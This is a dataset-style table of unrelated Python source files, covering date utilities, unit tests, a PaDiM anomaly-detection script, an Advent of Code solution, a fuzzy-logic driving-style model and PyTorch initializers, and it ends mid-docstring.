content (stringlengths 0–894k) | type (stringclasses, 2 values)
---|---|
from datetime import datetime, date
from dateutil.relativedelta import relativedelta
import re
from .util import calculate_price, DELIM_VALUE_REGEX, DOT_VALUE_REGEX
from isodate import parse_duration, parse_datetime
import pytz
def create_default_context(numeric, responseMetadata):
def cff_yeardiff(datestr1, datestr2):
if type(datestr1) is not str or type(datestr2) is not str:
return 0
d1 = datetime.strptime(datestr1, "%Y-%m-%d")
d2 = datetime.strptime(datestr2, "%Y-%m-%d")
return relativedelta(d1, d2).years
def cff_nthOfNextMonth(datestr, n, maxDayDiff=None):
"""Returns nth day of the next month after datestr.
If the return date is less than maxDayDiff away from date, then go to the next month.
"""
if type(datestr) is not str or type(n) is not int or n <= 0:
return None
parsed_date = datetime.strptime(datestr, "%Y-%m-%d")  # avoid shadowing datetime.date
new_date = (parsed_date + relativedelta(months=1)).replace(day=n)
if maxDayDiff and (new_date - parsed_date).days < maxDayDiff:
new_date = new_date + relativedelta(months=1)
return new_date.strftime("%Y-%m-%d")
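# Worked example (illustrative): cff_nthOfNextMonth("2024-01-20", 15) -> "2024-02-15";
# with maxDayDiff=30 the gap would be only 26 days, so it rolls on to "2024-03-15".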
# def cff_countArray(array, expression):
# return len([item for item in array if calculate_price(expression, item)])
def cff_countArray(*args):
# TODO: fix py-expression-eval so that the method signature above is called.
# Same applies to cff_addDuration.
array = list(args)
if not array:
return 0
expression = array.pop(-1)
return len(
[
item
for item in array
if calculate_price(expression, item, numeric, responseMetadata)
]
)
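# Hedged usage sketch: the expression string and items below are assumptions about the
# caller's schema, e.g. cff_countArray(item1, item2, "age > 18") would count the items
# for which calculate_price evaluates the expression to a truthy value.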
def cff_today():
return date.today().strftime("%Y-%m-%d")
def cff_addDuration(dt, duration):
if type(dt) is not str:
return None
dt = datetime.strptime(dt, "%Y-%m-%d")
duration = parse_duration(duration)
new_time = dt + relativedelta(
months=int(getattr(duration, "months", 0)),
days=int(getattr(duration, "days", 0)),
years=int(getattr(duration, "years", 0)),
)
return new_time.strftime("%Y-%m-%d")
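# Worked example (illustrative): cff_addDuration("2024-01-15", "P1Y2M") parses the
# ISO-8601 duration to years=1, months=2 and returns "2025-03-15".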
def cff_createdBetween(datestr1, datestr2):
if type(datestr1) is not str or type(datestr2) is not str:
return 0
datestr1 = re.sub(
DOT_VALUE_REGEX, ".", re.sub(DELIM_VALUE_REGEX, ":", datestr1)
)
datestr2 = re.sub(
DOT_VALUE_REGEX, ".", re.sub(DELIM_VALUE_REGEX, ":", datestr2)
)
d1 = parse_datetime(datestr1)
d2 = parse_datetime(datestr2)
date_created = responseMetadata.get("date_created", None)
date_created = (
parse_datetime(date_created) if date_created is not None else datetime.now()
)
# Convert date_created from a naive to an aware datetime,
# so that it can be compared with the timezone-aware datetimes d1 and d2.
# PyMongo always stores naive datetimes in UTC, so this is ok.
date_created = date_created.replace(tzinfo=pytz.utc)
return (date_created >= d1) and (date_created <= d2)
DEFAULT_CONTEXT = {
"cff_yeardiff": cff_yeardiff,
"cff_nthOfNextMonth": cff_nthOfNextMonth,
"cff_countArray": cff_countArray,
"cff_addDuration": cff_addDuration,
"cff_today": cff_today,
"cff_createdBetween": cff_createdBetween,
}
return DEFAULT_CONTEXT
| python |
import container_crawler.utils
import mock
import unittest
class TestUtils(unittest.TestCase):
@mock.patch('container_crawler.utils.InternalClient')
@mock.patch('container_crawler.utils.os')
def test_internal_client_path(self, os_mock, ic_mock):
os_mock.path.exists.return_value = True
os_mock.path.join.side_effect = lambda *x: '/'.join(x)
conf = {'internal_client_logname': 'TestClient',
'internal_client_path': '/etc/swift/internal-client.conf'}
container_crawler.utils.create_internal_client(conf, '/etc/swift')
ic_mock.assert_called_once_with(conf['internal_client_path'],
conf['internal_client_logname'], 3)
@mock.patch('container_crawler.utils.ConfigString')
@mock.patch('container_crawler.utils.InternalClient')
@mock.patch('container_crawler.utils.os')
def test_internal_client_path_not_found(self, os_mock, ic_mock, conf_mock):
os_mock.path.exists.return_value = False
os_mock.path.join.side_effect = lambda *x: '/'.join(x)
conf_string = mock.Mock()
conf_mock.return_value = conf_string
conf = {'internal_client_logname': 'TestClient',
'internal_client_path': '/etc/swift/internal-client.conf'}
container_crawler.utils.create_internal_client(conf, '/etc/swift')
os_mock.path.exists.assert_called_once_with(
conf['internal_client_path'])
conf_mock.assert_called_once_with(
container_crawler.utils.INTERNAL_CLIENT_CONFIG)
ic_mock.assert_called_once_with(
conf_string, conf['internal_client_logname'], 3)
| python |
import random
from random import sample
import argparse
import numpy as np
import os
import pickle
from tqdm import tqdm
from collections import OrderedDict
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import precision_recall_curve
from sklearn.covariance import LedoitWolf
from scipy.spatial.distance import mahalanobis
from scipy.ndimage import gaussian_filter
from skimage import morphology
from skimage.segmentation import mark_boundaries
import matplotlib.pyplot as plt
import matplotlib
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision.models import wide_resnet50_2, resnet18
import datasets.mvtec as mvtec
# device setup
use_cuda = torch.cuda.is_available()
device = torch.device('cuda' if use_cuda else 'cpu')
def parse_args():
parser = argparse.ArgumentParser('PaDiM')
parser.add_argument('--data_path', type=str, default='./datasets')
parser.add_argument('--save_path', type=str, default='./fundus_result')
parser.add_argument('--arch', type=str, choices=['resnet18', 'wide_resnet50_2'], default='resnet18')
return parser.parse_args()
_layer1 = 'layer2'
_layer2 = 'layer3'
# _layer3 = 'layer3'  # unused: only two hooks (layer2, layer3) are registered below
def main():
args = parse_args()
# load model
if args.arch == 'resnet18':
model = resnet18(pretrained=True, progress=True)
t_d = 384
d = 100
elif args.arch == 'wide_resnet50_2':
model = wide_resnet50_2(pretrained=True, progress=True)
t_d = 1536  # layer2 + layer3 channels of wide_resnet50_2 (512 + 1024); only two hooks are registered below
d = 550
model.to(device)
model.eval()
random.seed(1024)
torch.manual_seed(1024)
if use_cuda:
torch.cuda.manual_seed_all(1024)
idx = torch.tensor(sample(range(0, t_d), d))
# print(f'--> {idx.shape}')
# set model's intermediate outputs
outputs = []
def hook(module, input, output):
outputs.append(output)
model.layer2[-1].register_forward_hook(hook)
model.layer3[-1].register_forward_hook(hook)
# model.layer3[-1].register_forward_hook(hook)
os.makedirs(os.path.join(args.save_path, 'temp_%s' % args.arch), exist_ok=True)
fig, ax = plt.subplots(1, 2, figsize=(20, 10))
fig_img_rocauc = ax[0]
fig_pixel_rocauc = ax[1]
total_roc_auc = []
total_pixel_roc_auc = []
for class_name in mvtec.CLASS_NAMES:
train_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=True)
train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True)
test_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=False)
test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True)
train_outputs = OrderedDict([(_layer1, []), (_layer2, [])])
test_outputs = OrderedDict([(_layer1, []), (_layer2, [])])
# train_outputs = OrderedDict([('layer2', []), ('layer3', []), ('layer4', [])])
# test_outputs = OrderedDict([('layer2', []), ('layer3', []), ('layer4', [])])
# extract train set features
train_feature_filepath = os.path.join(args.save_path, 'temp_%s' % args.arch, 'train_%s.pkl' % class_name)
if not os.path.exists(train_feature_filepath):
for (x, _, _) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name):
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(train_outputs.keys(), outputs):
train_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in train_outputs.items():
train_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = train_outputs[_layer1]
for layer_name in [_layer2]:
embedding_vectors = embedding_concat(embedding_vectors, train_outputs[layer_name])
print(f'--> {embedding_vectors.shape}')
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate multivariate Gaussian distribution
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W)
mean = torch.mean(embedding_vectors, dim=0).numpy()
cov = torch.zeros(C, C, H * W).numpy()
I = np.identity(C)
for i in range(H * W):
# cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_
cov[:, :, i] = np.cov(embedding_vectors[:, :, i].numpy(), rowvar=False) + 0.01 * I
# save learned distribution
train_outputs = [mean, cov]
with open(train_feature_filepath, 'wb') as f:
pickle.dump(train_outputs, f)
else:
print('load train set feature from: %s' % train_feature_filepath)
with open(train_feature_filepath, 'rb') as f:
train_outputs = pickle.load(f)
gt_list = []
gt_mask_list = []
test_imgs = []
# extract test set features
for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name):
test_imgs.extend(x.cpu().detach().numpy())
gt_list.extend(y.cpu().detach().numpy())
gt_mask_list.extend(mask.cpu().detach().numpy())
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(test_outputs.keys(), outputs):
test_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in test_outputs.items():
test_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = test_outputs[_layer1]
for layer_name in [_layer2]:
embedding_vectors = embedding_concat(embedding_vectors, test_outputs[layer_name])
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate distance matrix
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W).numpy()
dist_list = []
for i in range(H * W):
mean = train_outputs[0][:, i]
conv_inv = np.linalg.inv(train_outputs[1][:, :, i])
dist = [mahalanobis(sample[:, i], mean, conv_inv) for sample in embedding_vectors]
dist_list.append(dist)
dist_list = np.array(dist_list).transpose(1, 0).reshape(B, H, W)
# upsample
dist_list = torch.tensor(dist_list)
score_map = F.interpolate(dist_list.unsqueeze(1), size=x.size(2), mode='bilinear',
align_corners=False).squeeze().numpy()
# apply gaussian smoothing on the score map
for i in range(score_map.shape[0]):
score_map[i] = gaussian_filter(score_map[i], sigma=4)
# Normalization
max_score = score_map.max()
min_score = score_map.min()
scores = (score_map - min_score) / (max_score - min_score)
# calculate image-level ROC AUC score
img_scores = scores.reshape(scores.shape[0], -1).max(axis=1)
gt_list = np.asarray(gt_list)
fpr, tpr, _ = roc_curve(gt_list, img_scores)
img_roc_auc = roc_auc_score(gt_list, img_scores)
total_roc_auc.append(img_roc_auc)
print('image ROCAUC: %.3f' % (img_roc_auc))
fig_img_rocauc.plot(fpr, tpr, label='%s img_ROCAUC: %.3f' % (class_name, img_roc_auc))
# get optimal threshold
gt_mask = np.asarray(gt_mask_list)
precision, recall, thresholds = precision_recall_curve(gt_mask.flatten(), scores.flatten())
a = 2 * precision * recall
b = precision + recall
f1 = np.divide(a, b, out=np.zeros_like(a), where=b != 0)
threshold = thresholds[np.argmax(f1)]
# # calculate per-pixel level ROCAUC
# fpr, tpr, _ = roc_curve(gt_mask.flatten(), scores.flatten())
# per_pixel_rocauc = roc_auc_score(gt_mask.flatten(), scores.flatten())
# total_pixel_roc_auc.append(per_pixel_rocauc)
# print('pixel ROCAUC: %.3f' % (per_pixel_rocauc))
# fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc))
save_dir = args.save_path + '/' + f'pictures_{args.arch}'
os.makedirs(save_dir, exist_ok=True)
plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name)
print('Average ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.title.set_text('Average image ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.legend(loc="lower right")
# print('Average pixel ROCUAC: %.3f' % np.mean(total_pixel_roc_auc))
# fig_pixel_rocauc.title.set_text('Average pixel ROCAUC: %.3f' % np.mean(total_pixel_roc_auc))
# fig_pixel_rocauc.legend(loc="lower right")
fig.tight_layout()
fig.savefig(os.path.join(args.save_path, 'roc_curve.png'), dpi=100)
def plot_fig(test_img, scores, gts, threshold, save_dir, class_name):
num = len(scores)
vmax = scores.max() * 255.
vmin = scores.min() * 255.
for i in range(num):
img = test_img[i]
img = denormalization(img)
# gt = gts[i].transpose(1, 2, 0).squeeze()
heat_map = scores[i] * 255
mask = scores[i]
mask[mask > threshold] = 1
mask[mask <= threshold] = 0
kernel = morphology.disk(4)
mask = morphology.opening(mask, kernel)
mask *= 255
vis_img = mark_boundaries(img, mask, color=(1, 0, 0), mode='thick')
fig_img, ax_img = plt.subplots(1, 5, figsize=(12, 3))
fig_img.subplots_adjust(right=0.9)
norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax)
for ax_i in ax_img:
ax_i.axes.xaxis.set_visible(False)
ax_i.axes.yaxis.set_visible(False)
ax_img[0].imshow(img)
ax_img[0].title.set_text('Image')
# ax_img[1].imshow(gt, cmap='gray')
ax_img[1].title.set_text('GroundTruth')
ax = ax_img[2].imshow(heat_map, cmap='jet', norm=norm)
ax_img[2].imshow(img, cmap='gray', interpolation='none')
ax_img[2].imshow(heat_map, cmap='jet', alpha=0.5, interpolation='none')
ax_img[2].title.set_text('Predicted heat map')
ax_img[3].imshow(mask, cmap='gray')
ax_img[3].title.set_text('Predicted mask')
ax_img[4].imshow(vis_img)
ax_img[4].title.set_text('Segmentation result')
left = 0.92
bottom = 0.15
width = 0.015
height = 1 - 2 * bottom
rect = [left, bottom, width, height]
cbar_ax = fig_img.add_axes(rect)
cb = plt.colorbar(ax, shrink=0.6, cax=cbar_ax, fraction=0.046)
cb.ax.tick_params(labelsize=8)
font = {
'family': 'serif',
'color': 'black',
'weight': 'normal',
'size': 8,
}
cb.set_label('Anomaly Score', fontdict=font)
fig_img.savefig(os.path.join(save_dir, class_name + '_{}'.format(i)), dpi=100)
plt.close()
def denormalization(x):
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
x = (((x.transpose(1, 2, 0) * std) + mean) * 255.).astype(np.uint8)
return x
def embedding_concat(x, y):
B, C1, H1, W1 = x.size()
_, C2, H2, W2 = y.size()
s = int(H1 / H2)
x = F.unfold(x, kernel_size=s, dilation=1, stride=s)
x = x.view(B, C1, -1, H2, W2)
z = torch.zeros(B, C1 + C2, x.size(2), H2, W2)
for i in range(x.size(2)):
z[:, :, i, :, :] = torch.cat((x[:, :, i, :, :], y), 1)
z = z.view(B, -1, H2 * W2)
z = F.fold(z, kernel_size=s, output_size=(H1, W1), stride=s)
return z
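# Shape sketch (illustrative): with x of shape (B, C1, 64, 64) and y of shape
# (B, C2, 32, 32), s = 2 and z comes out as (B, C1 + C2, 64, 64); each 2x2 patch
# of x is paired with the single y activation that covers it.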
if __name__ == '__main__':
main()
| python |
"""
A QUANTIDADE DE UMA LETRA, A PRIMEIRA E A ÚLTIMA VEZ QUE APARECERAM NA FRASE!
"""
frase = str(input('Digite uma frase: ')).strip()
frase = frase.upper()
print('A quantidade de A é {} '.format(frase.count('A')))
print('A primeira vez que A apareceu foi: {} '.format(frase.find('A')+1))
print('A última vez que A apareceu foi: {} '.format(frase.rfind('A')+1))
'''
dividido = frase.split()
print(dividido)]
print(''.format(dividido[].count(['a'])))
'''
| python |
ll = range(5, 20, 5)
for i in ll:
print(i)
print(ll)
x = 'Python'
for i in range(len(x)):
print(x[i]) | python |
from typing import Sequence, Union
from PIL import Image
class BaseTransform:
"""
Generic image transform type class
"""
slug: Union[None, str] = None # unique string that identifies a given transform
@staticmethod
def apply_transform(
img: Image.Image, parameters: Sequence[Union[str, int]]
) -> Image.Image:
raise NotImplementedError
@staticmethod
def derive_parameters(query: str) -> Sequence[Union[str, int]]:
raise NotImplementedError
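# A minimal sketch of a concrete transform built on this interface; the slug,
# parameter format, and rotation behaviour are assumptions, not part of the API.
class RotateTransform(BaseTransform):
slug = "rotate"
@staticmethod
def apply_transform(
img: Image.Image, parameters: Sequence[Union[str, int]]
) -> Image.Image:
# rotate counter-clockwise by the first parameter, in degrees
return img.rotate(int(parameters[0]))
@staticmethod
def derive_parameters(query: str) -> Sequence[Union[str, int]]:
# e.g. query "90" -> [90]
return [int(query)]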
| python |
from collections import Counter
input_data = open("day12.input").read().split("\n")
input_data = [tuple(a.split("-")) for a in input_data]
connections = []
for (a, b) in input_data:
if a != 'start':
connections.append((b, a))
connections += input_data
connections.sort()
def part1(path, b):
return b not in path
def part2(path, b):
count = Counter(path + [b])
lower2 = 0
for key in count.keys():
if key in ['start', 'end'] and count[key] > 1:
return False
if key.islower() and count[key] > 1:
if count[key] < 3:
lower2 += 1
else:
return False
return lower2 <= 1
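# In words: part2 allows at most one small cave to appear twice on a path
# (lower2 counts small caves seen twice); 'start' and 'end' may never repeat.
# part1 (each small cave at most once) is kept for reference but unused below.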
start_paths = [['start']]
end_paths = []
while True:
new_paths = []
for path in start_paths:
for (a, b) in connections:
if path[-1] == a and b == 'end':
end_paths.append(path + [b])
elif path[-1] == a and (b.isupper() or part2(path, b)):
new_paths.append(path + [b])
if len(new_paths) > 0:
start_paths = new_paths
else:
break
print('Result')
for path in end_paths:
print(path)
print(len(end_paths))
| python |
import os
import numpy as np
import pandas as pd
from typing import Dict, List, Tuple
import skfuzzy as fuzz
import skfuzzy.control as ctrl
from aggregation import OWA_T1
import matplotlib.pyplot as plt
class FLST1Model(object):
def __init__(self, rules_path:str, expert_mode:str):
self.antecedent = {}
self.consequent = {}
self.expert_mode = expert_mode
self.build_model()
self.system = self.build_rules(rules_dir=rules_path)
self.fuzz_inf = ctrl.ControlSystemSimulation(self.system,
flush_after_run=10)
def build_model(self)->None:
# ANTECEDENT
self.antecedent = {}
### Acceleration
self.antecedent['Acceleration'] = ctrl.Antecedent(universe=np.linspace(0,10, 11),
label='Acceleration')
self.antecedent['Acceleration']['small'] = \
fuzz.trapmf(self.antecedent['Acceleration'].universe, [0., 0., 3., 4.])
self.antecedent['Acceleration']['medium'] = \
fuzz.trapmf(self.antecedent['Acceleration'].universe, [3., 4., 6., 7.])
self.antecedent['Acceleration']['large'] = \
fuzz.trapmf(self.antecedent['Acceleration'].universe, [6., 7., 10., 10.])
### Deceleration
self.antecedent['Deceleration'] = ctrl.Antecedent(universe=np.linspace(0,10, 11),
label='Deceleration')
self.antecedent['Deceleration']['small'] = \
fuzz.trapmf(self.antecedent['Deceleration'].universe, [0., 0., 3., 4.])
self.antecedent['Deceleration']['medium'] = \
fuzz.trapmf(self.antecedent['Deceleration'].universe, [3., 4., 6., 7.])
self.antecedent['Deceleration']['large'] = \
fuzz.trapmf(self.antecedent['Deceleration'].universe, [6., 7., 10., 10.])
### Lateral Jerk
self.antecedent['LateralJerk'] = ctrl.Antecedent(universe=np.linspace(0,16, 17),
label='LateralJerk')
self.antecedent['LateralJerk']['small'] = \
fuzz.trapmf(self.antecedent['LateralJerk'].universe, [0., 0., 4., 6.])
self.antecedent['LateralJerk']['medium'] = \
fuzz.trapmf(self.antecedent['LateralJerk'].universe, [4., 6., 10., 12.])
self.antecedent['LateralJerk']['large'] = \
fuzz.trapmf(self.antecedent['LateralJerk'].universe, [10., 12., 16., 16.])
### Velocity
self.antecedent['Velocity'] = ctrl.Antecedent(universe=np.linspace(0,100, 101),
label='Velocity')
self.antecedent['Velocity']['very_slow'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [0., 0., 15., 20.])
self.antecedent['Velocity']['slow'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [15., 20., 30., 35.])
self.antecedent['Velocity']['normal'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [30., 35., 50., 55.])
self.antecedent['Velocity']['fast'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [50., 55., 70., 75.])
self.antecedent['Velocity']['very_fast'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [70., 75., 100., 100.])
# CONSEQUENT
### Behavior (Driving Style)
self.consequent['Behavior'] = ctrl.Consequent(universe=np.linspace(0,1., 11),
label='Behavior')
self.consequent['Behavior']['calm'] = fuzz.trapmf(self.consequent['Behavior'].universe,
[0., 0., 0.2, 0.4])
self.consequent['Behavior']['moderate'] = fuzz.trapmf(self.consequent['Behavior'].universe,
[0.2, 0.4, 0.6, 0.8])
self.consequent['Behavior']['aggressive'] = fuzz.trapmf(self.consequent['Behavior'].universe,
[0.6, 0.8, 1., 1.])
def build_rules(self, rules_dir:str)->ctrl.ControlSystem:
assert os.path.exists(rules_dir),\
('[Fuzzy Logic System T1 model][build_rules][ERROR]'
' rules_dir not found!{}').format(rules_dir)
rules_files = os.listdir(rules_dir)
rules = None
if self.expert_mode=='single':
rules_files[0] = 'rules_0.csv'
print('[Fuzzy Logic System T1 model][build_rules]', end='')
print(f' single expert system! (rule:{rules_files[0]})')
rules = self._single_expert_rules(os.path.join(rules_dir, rules_files[0]))
elif self.expert_mode=='multiple':
print('[Fuzzy Logic System - T1][build_rules]', end='')
print(f' multiple expert system: (n_e: {len(rules_files)})')
rules = self._multiple_expert_rules(rules_files, root_dir=rules_dir)
else:
assert False,\
('[Fuzzy Logic System T1 model][build_rules][ERROR]'
' expert_mode invalid! {}').format(self.expert_mode)
assert rules is not None,\
('[Fuzzy Logic System T1 model][build_rules][ERROR]'
' error while building rules..')
system = ctrl.ControlSystem(rules=rules)
return system
def _single_expert_rules(self, rule_file:str)->List:
rules = pd.read_csv(rule_file)
assert rules.shape[1] == 5,\
('[Fuzzy Logic System T1 model][build_rules] wrong rule_file shape'
'{} != (m, 5)'.format(rules.shape))
domain = {'calm':'calm',
'more_calm_than_moderate':'calm',
'between_calm_and_moderate':'moderate',
'more_moderate_than_calm':'moderate',
'moderate':'moderate',
'more_moderate_than_aggressive':'moderate',
'between_moderate_and_aggressive':'aggressive',
'more_aggressive_than_moderate':'aggressive',
'aggressive':'aggressive'}
#self._check_rules(rules=rules)
fuzz_rules = []
for line in rules.iterrows():
index, r = line[0], line[1]
xs = domain[r['driving_style']]
fr = ctrl.Rule(antecedent=(self.antecedent['Velocity'][r['velocity']] &\
self.antecedent['Acceleration'][r['acceleration']] &\
self.antecedent['Deceleration'][r['deceleration']] &\
self.antecedent['LateralJerk'][r['lateral_jerk']]),
consequent=self.consequent['Behavior'][xs],
label=f'rule - {index}')
fuzz_rules.append(fr)
return fuzz_rules
def _multiple_expert_function(self, label:str)->float:
domain = {'calm':1,
'more_calm_than_moderate':2,
'between_calm_and_moderate':3,
'more_moderate_than_calm':4,
'moderate':5,
'more_moderate_than_aggressive':6,
'between_moderate_and_aggressive':7,
'more_aggressive_than_moderate':8,
'aggressive':9}
return (1./9.)*domain[label]
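# Illustrative mapping: 'calm' -> 1/9 ~= 0.111, 'moderate' -> 5/9 ~= 0.556,
# 'aggressive' -> 9/9 = 1.0, i.e. the nine ordinal labels are spread evenly over (0, 1].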
def _multiple_expert_rules(self, rules_files:List[str], root_dir:str)->List:
rules = None
#get rules
decisions = []
for rule_file in rules_files:
_file = pd.read_csv(os.path.join(root_dir,rule_file))
decisions.append(_file['driving_style'].values)
rules = _file[['velocity', 'acceleration', 'deceleration', 'lateral_jerk']]
decisions = np.asarray(decisions).T
#aggregate decisions
y = []
for d in decisions:
#print(d, end="")
xs = np.array([self._multiple_expert_function(label=l) for l in d])
value = OWA_T1(X=xs,kind=2)
memb_value, set_labels = self._fuzz_driving_style(value=value)
y.append(set_labels[np.argmax(memb_value)])
#print(y[-1])
#create rules
fuzz_rules = []
for line, _y in zip(rules.iterrows(), y):
index, r = line[0], line[1]
fr = ctrl.Rule(antecedent=(self.antecedent['Velocity'][r['velocity']] &\
self.antecedent['Acceleration'][r['acceleration']] &\
self.antecedent['Deceleration'][r['deceleration']] &\
self.antecedent['LateralJerk'][r['lateral_jerk']]),
consequent=self.consequent['Behavior'][_y],
label=f'rule - {index}')
fuzz_rules.append(fr)
return fuzz_rules
def _fuzz_driving_style(self,value:float)->Tuple:
memb_value = []
set_labels = []
for label, term in self.consequent['Behavior'].terms.items():
mi = fuzz.interp_membership(self.consequent['Behavior'].universe,
term.mf,
value)
memb_value.append(mi)
set_labels.append(label)
return memb_value, set_labels
def inference(self, observation:Dict) -> Dict:
"""
perform inference at the fuzzy system
"""
vel = observation['velocity']*3.6 #m/s -> Km/h
acc = observation['acceleration'] #m/s^2
dec = observation['deceleration'] #m/s^2
ljk = observation['lateral_jerk'] #std (m/s^3)
self.fuzz_inf.input['Acceleration'] = acc
self.fuzz_inf.input['Deceleration'] = dec
self.fuzz_inf.input['LateralJerk'] = ljk
self.fuzz_inf.input['Velocity'] = vel
self.fuzz_inf.compute()
y = self.fuzz_inf.output['Behavior']
memb_value, set_labels = self._fuzz_driving_style(value=y)
result = {}
result['value'] = y
result['membership_values'] = np.asarray(memb_value)
result['set_labels']=set_labels
return result
def plot(self)-> None:
self.antecedent['Acceleration'].view()
self.antecedent['Deceleration'].view()
self.antecedent['Velocity'].view()
self.consequent['Behavior'].view()
plt.show()
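# Usage sketch (paths and observation values are assumptions, not shipped defaults):
# model = FLST1Model(rules_path='./rules', expert_mode='single')
# result = model.inference({'velocity': 12.0, 'acceleration': 2.5,
#                           'deceleration': 1.0, 'lateral_jerk': 3.0})
# result['set_labels'][result['membership_values'].argmax()] -> e.g. 'moderate'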
| python |
from distutils.core import setup
from Cython.Build import cythonize
setup(ext_modules = cythonize('fasterloop.pyx'))
| python |
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from enum import Enum, unique
@unique
class AnalyzeFieldIdx(Enum):
IDX_MODULE_NAME = 0
IDX_ANALYZE_NAME = 1
IDX_COLUMN_INFO = 2
IDX_IS_EXECUTE = 3
| python |
import unittest
from . import day01
class TestDay1(unittest.TestCase):
def test_basic(self):
self.assertEqual('hello', 'hello')
def test_fuel_is_calculated_correctly_for_given_examples(self):
self.assertEqual(day01.get_fuel_required(module_mass=12), 2)
self.assertEqual(day01.get_fuel_required(module_mass=14), 2)
self.assertEqual(day01.get_fuel_required(module_mass=1969), 654)
self.assertEqual(day01.get_fuel_required(module_mass=100756), 33583)
def test_fuel_for_fuel_is_calculated_correctly_for_given_examples(self):
self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=2), 0)
self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=654), 966-654)
self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=33583), 50346-33583)
if __name__ == "__main__":
unittest.main() | python |
# Code by JohnXdator
n,k = map(int,input().split())
ups = list(map(int,input().split()))
count = 0
for i in range(n):
if ups[k-1] == 0 and ups[i] == ups[k-1]:
continue  # a score of zero never advances
elif ups[k-1] <= ups[i]:
count = count + 1
print(count)
| python |
from django.test import TestCase
from django.core.management import call_command
class TestUi(TestCase):
def setUp(self):
call_command('loaddata', 'user', verbosity=0)
call_command('loaddata', 'init', verbosity=0)
call_command('loaddata', 'test/testWorld', verbosity=0)
def test_ui(self):
response = self.client.post('/ui/login/', {'username': 'admin', 'password': 'admin1379'})
self.assertEqual(response.status_code, 200)
def test_wrong_pwd(self):
response = self.client.post('/ui/login/', {'username': 'admin', 'password': 'admin137xxx'})
self.assertEqual(response.status_code, 401)
def test_bad_user(self):
response = self.client.post('/ui/login/', {'username': 'adminxxx', 'password': 'admin1379'})
self.assertEqual(response.status_code, 401) | python |
import math
import warnings
from torch import Tensor
import torch.nn as nn
def zeros_():
"""Return the initializer filling the input Tensor with the scalar zeros"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.zeros_(tensor)
return initializer
def ones_():
"""Return the initializer filling the input Tensor with the scalar ones"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.ones_(tensor)
return initializer
def uniform_(a: float = 0., b: float = 1.):
r"""Return the initializer filling the input Tensor with values drawn from the uniform
distribution :math:`\mathcal{U}(a, b)`.
Args:
a (float): the lower bound of the uniform distribution. Defaults 0.0.
b (float): the upper bound of the uniform distribution. Defaults 1.0.
"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.uniform_(tensor, a, b)
return initializer
def normal_(mean: float = 0., std: float = 1.):
r"""Return the initializer filling the input Tensor with values drawn from the normal distribution
.. math::
\mathcal{N}(\text{mean}, \text{std}^2)
Args:
mean (float): the mean of the normal distribution. Defaults 0.0.
std (float): the standard deviation of the normal distribution. Defaults 1.0.
"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.normal_(tensor, mean, std)
return initializer
def trunc_normal_(mean: float = 0., std: float = 1., a: float = -2., b: float = 2.):
r"""Return the initializer filling the input Tensor with values drawn from a truncated
normal distribution. The values are effectively drawn from the
normal distribution :math:`\mathcal{N}(\text{mean}, \text{std}^2)`
with values outside :math:`[a, b]` redrawn until they are within
the bounds. The method used for generating the random values works
best when :math:`a \leq \text{mean} \leq b`.
Args:
mean (float): the mean of the normal distribution. Defaults 0.0.
std (float): the standard deviation of the normal distribution. Defaults 1.0.
a (float): the minimum cutoff value. Defaults -2.0.
b (float): the maximum cutoff value. Defaults 2.0.
"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.trunc_normal_(tensor, mean, std, a, b)
return initializer
def kaiming_uniform_(a=0, mode='fan_in', nonlinearity='leaky_relu'):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Delving deep into rectifiers: Surpassing human-level
performance on ImageNet classification` - He, K. et al. (2015), using a
uniform distribution. The resulting tensor will have values sampled from
:math:`\mathcal{U}(-\text{bound}, \text{bound})` where
.. math::
\text{bound} = \text{gain} \times \sqrt{\frac{3}{\text{fan_mode}}}
Also known as 'He initialization'.
Args:
a (int): the negative slope of the rectifier used after this layer (only used with ``'leaky_relu'``).
mode (str, optional): either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'``
preserves the magnitude of the variance of the weights in the
